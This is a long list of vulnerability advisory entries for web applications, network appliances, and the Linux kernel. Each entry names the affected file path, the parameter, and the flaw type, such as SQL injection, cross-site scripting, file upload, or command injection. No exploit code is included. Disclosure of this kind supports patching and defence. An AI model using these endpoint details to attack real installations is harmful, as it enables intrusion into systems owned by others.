A vulnerability classified as problematic was found in Campcodes Online Examination System 1.0. Affected by this vulnerability is an unknown functionality of the file /adminpanel/admin/facebox_modal/updateCourse.php. The manipulation of the argument id leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-258031.
A vulnerability classified as problematic has been found in Campcodes Online Examination System 1.0. Affected is an unknown function of the file /adminpanel/admin/facebox_modal/updateExaminee.php. The manipulation of the argument id leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-258030 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Online Examination System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /adminpanel/admin/facebox_modal/updateCourse.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258029 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in SourceCodester Todo List in Kanban Board 1.0. Affected by this issue is some unknown functionality of the component Add ToDo. The manipulation of the argument Todo leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in SourceCodester Todo List in Kanban Board 1.0. Affected by this vulnerability is an unknown functionality of the file /endpoint/delete-todo.php. The manipulation of the argument list leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258013 was assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Online Chatting System 1.0. Affected is an unknown function of the file admin/update_room.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258012.
A vulnerability was found in SourceCodester Music Gallery Site 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file classes/Master.php?f=save_music. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258001 was assigned to this vulnerability.
A vulnerability was found in code-projects Mobile Shop 1.0. It has been classified as critical. Affected is an unknown function of the file Details.php of the component Login Page. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258000.
A vulnerability was found in Campcodes House Rental Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file index.php. The manipulation of the argument page leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257983.
A vulnerability was found in Campcodes House Rental Management System 1.0. It has been classified as critical. Affected is an unknown function of the file ajax.php. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257982 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in Tianjin PubliCMS 4.0.202302.e. This affects an unknown part. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in SourceCodester Simple File Manager 1.0. This vulnerability affects unknown code. The manipulation of the argument photo leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257770 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in Campcodes Online Shopping System 1.0. This vulnerability affects unknown code of the file /offersmail.php. The manipulation of the argument email leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257752.
A vulnerability, which was classified as critical, has been found in lakernote EasyAdmin up to 20240315. This issue affects some unknown processing of the file /ureport/designer/saveReportFile. The manipulation leads to server-side request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257717 was assigned to this vulnerability.
A vulnerability classified as problematic was found in lakernote EasyAdmin up to 20240315. This vulnerability affects unknown code of the file /ureport/designer/saveReportFile. The manipulation leads to xml external entity reference. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257716.
A vulnerability classified as critical has been found in lakernote EasyAdmin up to 20240315. This affects an unknown part of the file /ureport/designer/saveReportFile. The manipulation of the argument file leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257715.
A vulnerability has been found in DedeCMS 5.7 and classified as problematic. This vulnerability affects unknown code of the file /src/dede/mda_main.php. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257710 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in DedeCMS 5.7. This affects an unknown part of the file /src/dede/vote_edit.php. The manipulation of the argument aid leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257709 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in DedeCMS 5.7. Affected by this issue is some unknown functionality of the file /src/dede/friendlink_edit.php. The manipulation of the argument id leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257708. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in DedeCMS 5.7. Affected by this vulnerability is an unknown functionality of the file /src/dede/baidunews.php. The manipulation of the argument filename leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257707. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Campcodes Online Marriage Registration System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/admin-profile.php. The manipulation of the argument adminname leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257614 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Online Marriage Registration System 1.0. It has been classified as problematic. This affects an unknown part of the file /admin/application-bwdates-reports-details.php. The manipulation of the argument fromdate leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257613 was assigned to this vulnerability.
A vulnerability was found in Campcodes Online Marriage Registration System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/search.php. The manipulation of the argument searchdata leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257612.
A vulnerability has been found in Campcodes Online Marriage Registration System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/application-bwdates-reports-details.php. The manipulation of the argument fromdate leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257611.
A vulnerability, which was classified as critical, was found in Campcodes Online Marriage Registration System 1.0. Affected is an unknown function of the file /admin/search.php. The manipulation of the argument searchdata leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257610 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Campcodes Online Marriage Registration System 1.0. This issue affects some unknown processing of the file /user/user-profile.php. The manipulation of the argument lname leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257609 was assigned to this vulnerability.
A vulnerability classified as critical was found in Campcodes Online Marriage Registration System 1.0. This vulnerability affects unknown code of the file /user/search.php. The manipulation of the argument searchdata leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257608.
A vulnerability classified as problematic has been found in Campcodes Online Marriage Registration System 1.0. This affects an unknown part of the file /user/search.php. The manipulation of the argument searchdata leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257607.
A vulnerability was found in Campcodes Complete Online Beauty Parlor Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/contact-us.php. The manipulation of the argument email leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257606 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Complete Online Beauty Parlor Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/admin-profile.php. The manipulation of the argument adminname leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257605 was assigned to this vulnerability.
A vulnerability was found in Campcodes Complete Online Beauty Parlor Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/edit-services.php. The manipulation of the argument editid leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257604.
A vulnerability was found in Campcodes Complete Online Beauty Parlor Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/forgot-password.php. The manipulation of the argument email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257603.
A vulnerability has been found in Campcodes Complete Online Beauty Parlor Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/index.php. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257602 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Complete E-Commerce Site 1.0. Affected is an unknown function of the file /admin/users_photo.php. The manipulation of the argument photo leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257544.
A vulnerability classified as problematic was found in Campcodes Complete Online DJ Booking System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/aboutus.php. The manipulation of the argument pagetitle leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257473 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in Campcodes Complete Online DJ Booking System 1.0. Affected is an unknown function of the file /admin/admin-profile.php. The manipulation of the argument adminname leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257472.
A vulnerability was found in Campcodes Complete Online DJ Booking System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /admin/booking-bwdates-reports-details.php. The manipulation of the argument fromdate leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257471.
A vulnerability was found in Campcodes Complete Online DJ Booking System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/booking-search.php. The manipulation of the argument searchdata leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257470 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Complete Online DJ Booking System 1.0. It has been classified as problematic. This affects an unknown part of the file /admin/contactus.php. The manipulation of the argument email leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257469 was assigned to this vulnerability.
A vulnerability was found in Campcodes Complete Online DJ Booking System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/user-search.php. The manipulation of the argument searchdata leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257468.
A vulnerability has been found in Campcodes Complete Online DJ Booking System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/booking-bwdates-reports-details.php. The manipulation of the argument fromdate leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257467.
A vulnerability, which was classified as critical, was found in Campcodes Complete Online DJ Booking System 1.0. Affected is an unknown function of the file /admin/booking-search.php. The manipulation of the argument searchdata leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257466 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in Campcodes Complete Online DJ Booking System 1.0. This issue affects some unknown processing of the file /admin/user-search.php. The manipulation of the argument searchdata leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257465 was assigned to this vulnerability.
Wings is the server control plane for Pterodactyl Panel. This vulnerability impacts anyone running the affected versions of Wings. The vulnerability can potentially be used to access files and directories on the host system. The full scope of impact is exactly unknown, but reading files outside of a server's base directory (sandbox root) is possible. In order to use this exploit, an attacker must have an existing "server" allocated and controlled by Wings. Details on the exploitation of this vulnerability are embargoed until March 27th, 2024 at 18:00 UTC. In order to mitigate this vulnerability, a full rewrite of the entire server filesystem was necessary. Because of this, the size of the patch is massive, however effort was made to reduce the amount of breaking changes. Users are advised to update to version 1.11.9. There are no known workarounds for this vulnerability.
A vulnerability was found in SourceCodester Online Discussion Forum Site 1.0. It has been classified as critical. Affected is an unknown function of the file /uupdate.php. The manipulation of the argument ima leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257388.
A vulnerability was found in Campcodes Online Job Finder System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/applicants/index.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257387.
A vulnerability has been found in Campcodes Online Job Finder System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /admin/applicants/controller.php. The manipulation of the argument JOBREGID leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257386 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in Campcodes Online Job Finder System 1.0. This affects an unknown part of the file /admin/applicants/index.php. The manipulation of the argument view leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257385 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Campcodes Online Job Finder System 1.0. Affected by this issue is some unknown functionality of the file /admin/category/index.php. The manipulation of the argument view leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257384.
A vulnerability classified as problematic was found in Campcodes Online Job Finder System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/company/index.php. The manipulation of the argument view leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257383.
A vulnerability classified as problematic has been found in Campcodes Online Job Finder System 1.0. Affected is an unknown function of the file /admin/employee/controller.php. The manipulation of the argument EMPLOYEEID leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257382 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Online Job Finder System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /admin/employee/index.php. The manipulation of the argument view leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257381 was assigned to this vulnerability.
A vulnerability was found in Campcodes Online Job Finder System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/user/index.php. The manipulation of the argument view leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257380.
A vulnerability was found in Campcodes Online Job Finder System 1.0. It has been classified as problematic. This affects an unknown part of the file /admin/vacancy/index.php. The manipulation of the argument view leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257379.
A vulnerability was found in Campcodes Online Job Finder System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/applicants/controller.php. The manipulation of the argument JOBREGID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257378 is the identifier assigned to this vulnerability.
A vulnerability has been found in Campcodes Online Job Finder System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/category/controller.php. The manipulation of the argument CATEGORYID leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257377 was assigned to this vulnerability.
In the Linux kernel, the following vulnerability has been resolved: LoongArch: Change acpi_core_pic[NR_CPUS] to acpi_core_pic[MAX_CORE_PIC] With default config, the value of NR_CPUS is 64. When HW platform has more then 64 cpus, system will crash on these platforms. MAX_CORE_PIC is the maximum cpu number in MADT table (max physical number) which can exceed the supported maximum cpu number (NR_CPUS, max logical number), but kernel should not crash. Kernel should boot cpus with NR_CPUS, let the remainder cpus stay in BIOS. The potential crash reason is that the array acpi_core_pic[NR_CPUS] can be overflowed when parsing MADT table, and it is obvious that CORE_PIC should be corresponding to physical core rather than logical core, so it is better to define the array as acpi_core_pic[MAX_CORE_PIC]. With the patch, system can boot up 64 vcpus with qemu parameter -smp 128, otherwise system will crash with the following message. [ 0.000000] CPU 0 Unable to handle kernel paging request at virtual address 0000420000004259, era == 90000000037a5f0c, ra == 90000000037a46ec [ 0.000000] Oops[#1]: [ 0.000000] CPU: 0 PID: 0 Comm: swapper Not tainted 6.8.0-rc2+ #192 [ 0.000000] Hardware name: QEMU QEMU Virtual Machine, BIOS unknown 2/2/2022 [ 0.000000] pc 90000000037a5f0c ra 90000000037a46ec tp 9000000003c90000 sp 9000000003c93d60 [ 0.000000] a0 0000000000000019 a1 9000000003d93bc0 a2 0000000000000000 a3 9000000003c93bd8 [ 0.000000] a4 9000000003c93a74 a5 9000000083c93a67 a6 9000000003c938f0 a7 0000000000000005 [ 0.000000] t0 0000420000004201 t1 0000000000000000 t2 0000000000000001 t3 0000000000000001 [ 0.000000] t4 0000000000000003 t5 0000000000000000 t6 0000000000000030 t7 0000000000000063 [ 0.000000] t8 0000000000000014 u0 ffffffffffffffff s9 0000000000000000 s0 9000000003caee98 [ 0.000000] s1 90000000041b0480 s2 9000000003c93da0 s3 9000000003c93d98 s4 9000000003c93d90 [ 0.000000] s5 9000000003caa000 s6 000000000a7fd000 s7 000000000f556b60 s8 000000000e0a4330 [ 0.000000] ra: 90000000037a46ec platform_init+0x214/0x250 [ 0.000000] ERA: 90000000037a5f0c efi_runtime_init+0x30/0x94 [ 0.000000] CRMD: 000000b0 (PLV0 -IE -DA +PG DACF=CC DACM=CC -WE) [ 0.000000] PRMD: 00000000 (PPLV0 -PIE -PWE) [ 0.000000] EUEN: 00000000 (-FPE -SXE -ASXE -BTE) [ 0.000000] ECFG: 00070800 (LIE=11 VS=7) [ 0.000000] ESTAT: 00010000 [PIL] (IS= ECode=1 EsubCode=0) [ 0.000000] BADV: 0000420000004259 [ 0.000000] PRID: 0014c010 (Loongson-64bit, Loongson-3A5000) [ 0.000000] Modules linked in: [ 0.000000] Process swapper (pid: 0, threadinfo=(____ptrval____), task=(____ptrval____)) [ 0.000000] Stack : 9000000003c93a14 9000000003800898 90000000041844f8 90000000037a46ec [ 0.000000] 000000000a7fd000 0000000008290000 0000000000000000 0000000000000000 [ 0.000000] 0000000000000000 0000000000000000 00000000019d8000 000000000f556b60 [ 0.000000] 000000000a7fd000 000000000f556b08 9000000003ca7700 9000000003800000 [ 0.000000] 9000000003c93e50 9000000003800898 9000000003800108 90000000037a484c [ 0.000000] 000000000e0a4330 000000000f556b60 000000000a7fd000 000000000f556b08 [ 0.000000] 9000000003ca7700 9000000004184000 0000000000200000 000000000e02b018 [ 0.000000] 000000000a7fd000 90000000037a0790 9000000003800108 0000000000000000 [ 0.000000] 0000000000000000 000000000e0a4330 000000000f556b60 000000000a7fd000 [ 0.000000] 000000000f556b08 000000000eaae298 000000000eaa5040 0000000000200000 [ 0.000000] ... [ 0.000000] Call Trace: [ 0.000000] [&lt;90000000037a5f0c&gt;] efi_runtime_init+0x30/0x94 [ 0.000000] [&lt;90000000037a46ec&gt;] platform_init+0x214/0x250 [ 0.000000] [&lt;90000000037a484c&gt;] setup_arch+0x124/0x45c [ 0.000000] [&lt;90000000037a0790&gt;] start_kernel+0x90/0x670 [ 0.000000] [&lt;900000000378b0d8&gt;] kernel_entry+0xd8/0xdc
A vulnerability, which was classified as critical, was found in Campcodes Online Job Finder System 1.0. Affected is an unknown function of the file /admin/company/controller.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257376.
A vulnerability, which was classified as critical, has been found in Campcodes Online Job Finder System 1.0. This issue affects some unknown processing of the file /admin/company/index.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257375.
A vulnerability classified as critical was found in Campcodes Online Job Finder System 1.0. This vulnerability affects unknown code of the file /admin/employee/index.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257374 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in Campcodes Online Job Finder System 1.0. This affects an unknown part of the file /admin/login.php. The manipulation of the argument user_email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257373 was assigned to this vulnerability.
A vulnerability was found in Campcodes Online Job Finder System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/user/controller.php. The manipulation of the argument UESRID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257372.
A vulnerability was found in Campcodes Online Job Finder System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/user/index.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257371.
A vulnerability was found in Campcodes Online Job Finder System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/vacancy/index.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257370 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Online Job Finder System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/employee/controller.php of the component GET Parameter Handler. The manipulation of the argument EMPLOYEEID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257369 was assigned to this vulnerability.
A vulnerability has been found in Campcodes Online Job Finder System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/vacancy/controller.php. The manipulation of the argument id/CATEGORY leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257368.
In the Linux kernel, the following vulnerability has been resolved: LoongArch: BPF: Prevent out-of-bounds memory access The test_tag test triggers an unhandled page fault: # ./test_tag [ 130.640218] CPU 0 Unable to handle kernel paging request at virtual address ffff80001b898004, era == 9000000003137f7c, ra == 9000000003139e70 [ 130.640501] Oops[#3]: [ 130.640553] CPU: 0 PID: 1326 Comm: test_tag Tainted: G D O 6.7.0-rc4-loong-devel-gb62ab1a397cf #47 61985c1d94084daa2432f771daa45b56b10d8d2a [ 130.640764] Hardware name: QEMU QEMU Virtual Machine, BIOS unknown 2/2/2022 [ 130.640874] pc 9000000003137f7c ra 9000000003139e70 tp 9000000104cb4000 sp 9000000104cb7a40 [ 130.641001] a0 ffff80001b894000 a1 ffff80001b897ff8 a2 000000006ba210be a3 0000000000000000 [ 130.641128] a4 000000006ba210be a5 00000000000000f1 a6 00000000000000b3 a7 0000000000000000 [ 130.641256] t0 0000000000000000 t1 00000000000007f6 t2 0000000000000000 t3 9000000004091b70 [ 130.641387] t4 000000006ba210be t5 0000000000000004 t6 fffffffffffffff0 t7 90000000040913e0 [ 130.641512] t8 0000000000000005 u0 0000000000000dc0 s9 0000000000000009 s0 9000000104cb7ae0 [ 130.641641] s1 00000000000007f6 s2 0000000000000009 s3 0000000000000095 s4 0000000000000000 [ 130.641771] s5 ffff80001b894000 s6 ffff80001b897fb0 s7 9000000004090c50 s8 0000000000000000 [ 130.641900] ra: 9000000003139e70 build_body+0x1fcc/0x4988 [ 130.642007] ERA: 9000000003137f7c build_body+0xd8/0x4988 [ 130.642112] CRMD: 000000b0 (PLV0 -IE -DA +PG DACF=CC DACM=CC -WE) [ 130.642261] PRMD: 00000004 (PPLV0 +PIE -PWE) [ 130.642353] EUEN: 00000003 (+FPE +SXE -ASXE -BTE) [ 130.642458] ECFG: 00071c1c (LIE=2-4,10-12 VS=7) [ 130.642554] ESTAT: 00010000 [PIL] (IS= ECode=1 EsubCode=0) [ 130.642658] BADV: ffff80001b898004 [ 130.642719] PRID: 0014c010 (Loongson-64bit, Loongson-3A5000) [ 130.642815] Modules linked in: [last unloaded: bpf_testmod(O)] [ 130.642924] Process test_tag (pid: 1326, threadinfo=00000000f7f4015f, task=000000006499f9fd) [ 130.643062] Stack : 0000000000000000 9000000003380724 0000000000000000 0000000104cb7be8 [ 130.643213] 0000000000000000 25af8d9b6e600558 9000000106250ea0 9000000104cb7ae0 [ 130.643378] 0000000000000000 0000000000000000 9000000104cb7be8 90000000049f6000 [ 130.643538] 0000000000000090 9000000106250ea0 ffff80001b894000 ffff80001b894000 [ 130.643685] 00007ffffb917790 900000000313ca94 0000000000000000 0000000000000000 [ 130.643831] ffff80001b894000 0000000000000ff7 0000000000000000 9000000100468000 [ 130.643983] 0000000000000000 0000000000000000 0000000000000040 25af8d9b6e600558 [ 130.644131] 0000000000000bb7 ffff80001b894048 0000000000000000 0000000000000000 [ 130.644276] 9000000104cb7be8 90000000049f6000 0000000000000090 9000000104cb7bdc [ 130.644423] ffff80001b894000 0000000000000000 00007ffffb917790 90000000032acfb0 [ 130.644572] ... [ 130.644629] Call Trace: [ 130.644641] [&lt;9000000003137f7c&gt;] build_body+0xd8/0x4988 [ 130.644785] [&lt;900000000313ca94&gt;] bpf_int_jit_compile+0x228/0x4ec [ 130.644891] [&lt;90000000032acfb0&gt;] bpf_prog_select_runtime+0x158/0x1b0 [ 130.645003] [&lt;90000000032b3504&gt;] bpf_prog_load+0x760/0xb44 [ 130.645089] [&lt;90000000032b6744&gt;] __sys_bpf+0xbb8/0x2588 [ 130.645175] [&lt;90000000032b8388&gt;] sys_bpf+0x20/0x2c [ 130.645259] [&lt;9000000003f6ab38&gt;] do_syscall+0x7c/0x94 [ 130.645369] [&lt;9000000003121c5c&gt;] handle_syscall+0xbc/0x158 [ 130.645507] [ 130.645539] Code: 380839f6 380831f9 28412bae &lt;24000ca6&gt; 004081ad 0014cb50 004083e8 02bff34c 58008e91 [ 130.645729] [ 130.646418] ---[ end trace 0000000000000000 ]--- On my machine, which has CONFIG_PAGE_SIZE_16KB=y, the test failed at loading a BPF prog with 2039 instructions: prog = (struct bpf_prog *)ffff80001b894000 insn = (struct bpf_insn *)(prog-&gt;insnsi)fff ---truncated---
A vulnerability has been found in Netentsec NS-ASG Application Security Gateway 6.3 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /protocol/iscdevicestatus/deleteonlineuser.php. The manipulation of the argument messagecontent leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257287. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in Netentsec NS-ASG Application Security Gateway 6.3. Affected is an unknown function of the file /nac/naccheck.php. The manipulation of the argument username leads to improper neutralization of data within xpath expressions. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257286 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in Netentsec NS-ASG Application Security Gateway 6.3. This issue affects some unknown processing of the file /admin/singlelogin.php. The manipulation of the argument loginId leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257285 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in Netentsec NS-ASG Application Security Gateway 6.3. This vulnerability affects unknown code of the file /vpnweb/index.php?para=index. The manipulation of the argument check_VirtualSiteId leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257284. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in Netentsec NS-ASG Application Security Gateway 6.3. This affects an unknown part of the file /vpnweb/resetpwd/resetpwd.php. The manipulation of the argument UserId leads to improper neutralization of data within xpath expressions. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257283. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been rated as critical. Affected by this issue is some unknown functionality of the file /protocol/firewall/addfirewall.php. The manipulation of the argument FireWallTableArray leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257282 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Ruijie RG-NBS2009G-P up to 20240305. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /EXCU_SHELL. The manipulation of the argument Command1 leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257281 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Ruijie RG-NBS2009G-P up to 20240305. It has been classified as critical. Affected is an unknown function of the file /system/passwdManage.htm of the component Password Handler. The manipulation leads to improper authorization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257280. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Bdtask Wholesale Inventory Management System up to 20240311. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to session fixiation. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318. It has been classified as critical. This affects an unknown part of the file /api/client/editemedia.php. The manipulation of the argument number/enterprise_uuid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257199.
